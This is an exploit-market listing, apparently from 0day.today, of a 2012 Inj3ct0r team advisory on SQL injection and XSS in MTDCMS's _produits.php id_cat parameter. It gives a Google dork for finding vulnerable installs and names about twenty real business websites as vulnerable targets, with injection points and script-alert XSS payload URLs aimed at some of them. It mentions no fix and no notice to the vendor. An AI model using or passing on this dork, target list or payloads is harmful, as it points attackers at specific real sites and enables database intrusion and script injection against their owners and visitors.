[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MTDCMS - XSS / SQL Injection Vulnerability

Author
the_cyber_nuxbie
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-17656
Category
web applications
Date add
11-03-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Official Website: http://www.1337day.com                        0
1  [+] Support E-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1                ##########################################            1
0                I'm NuxbieCyber Member From Inj3ct0r Team             1
1                ##########################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[ MTDCMS - SQL Injection Vulnerability ]

[x] Author : the_cyber_nuxbie
[x] Home   : www.thecybernuxbie.com
[x] E-mail : staff@thecybernuxbie.com
[x] Found  : 11 March 2012 @ 06:55 AM.
[x] Tested : Back|Track 5.
[x] Dork   : inurl:"/_produits.php?id_cat=" intext:"Powered By MTD Group"
________________________________________________________________________
************************************************************************

- Info WebApps:
This Content Develop By:
Powered By MTD Group @ 2007-2011 - MTD
http://www.mediatd.com/

- Exploit Report:
http://localhost/WebApps/_produits.php?id_cat=[SQL Injection]

- Sample WebApps Vuln SQLi:
http://mtdgroup-mailserver.com/bestfactory/fr/_produits.php?id_cat=3' + [SQL Injection]
http://adem-tn.com/ang/_produits.php?id_cat=3' + [SQL Injection]
http://clubyogo.com/fr/_produits.php?id_cat=2' + [SQL Injection]
http://cotrag-tn.com/ang/_produits.php?id_cat=2' + [SQL Injection]
http://deyma-gift.com/ang/_produits.php?id_cat=4' + [SQL Injection]
http://domelec-tn.com/fr/_produits.php?id_cat=6' + [SQL Injection]
http://francis-crespo.com/ang/_produits.php?id_cat=5' + [SQL Injection]
http://globalevolution.com.tn/fr/_produits.php?id_cat=1' + [SQL Injection]
http://idealceram.com/ang/_produits.php?id_cat=1' + [SQL Injection]
http://kindachaussettes.com/ang/_produits.php?id_cat=2' + [SQL Injection]
http://labidiviandes.com/fr/_produits.php?id_cat=4' + [SQL Injection]
http://lifestyle-porcelanosa.com/ang/_produits.php?id_cat=4' + [SQL Injection]
http://materna-tn.com/fr/_produits.php?id_cat=8' + [SQL Injection]
http://magseeds.net/ang/_produits.php?id_cat=4' + [SQL Injection]
http://nord-industrie.com/ang/_produits.php?id_cat=5' + [SQL Injection]
http://sotumar-marbre.com/ang/_produits.php?id_cat=1' + [SQL Injection]
http://tunicom.com.tn/fr/_produits.php?id_cat=3' + [SQL Injection]
http://vitalait.net/fr/_produits.php?id_cat=3' + [SQL Injection]
http://yogo.com.tn/fr/_produits.php?id_cat=9' + [SQL Injection]
http://safitextile.com/fr/_produits.php?id_cat=4' + [SQL Injection]

 - Google Dork:
 inurl:"/_produits.php?id_cat="

 - Exploit Concept:
 http://lokalisasi/_produits.php?id_cat=[XSS]

 - Sample Web Persistent XSS Vulnerability:
 http://mtdgroup-mailserver.com/bestfactory/fr/_produits.php?id_cat=<script>alert(31337);</script> <:- [XSS]
 http://adem-tn.com/ang/_produits.php?id_cat=<script>alert(31337);</script> <:- [XSS]
 http://cotrag-tn.com/ang/_produits.php?id_cat=<script>alert(31337);</script> <:- [XSS]
 http://deyma-gift.com/ang/_produits.php?id_cat=<script>alert(31337);</script> <:- [XSS]
 http://domelec-tn.com/fr/_produits.php?id_cat=<script>alert(31337);</script> <:- [XSS]


, And Many More @ Google...!!!

- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...



#  0day.today [2024-12-26]  #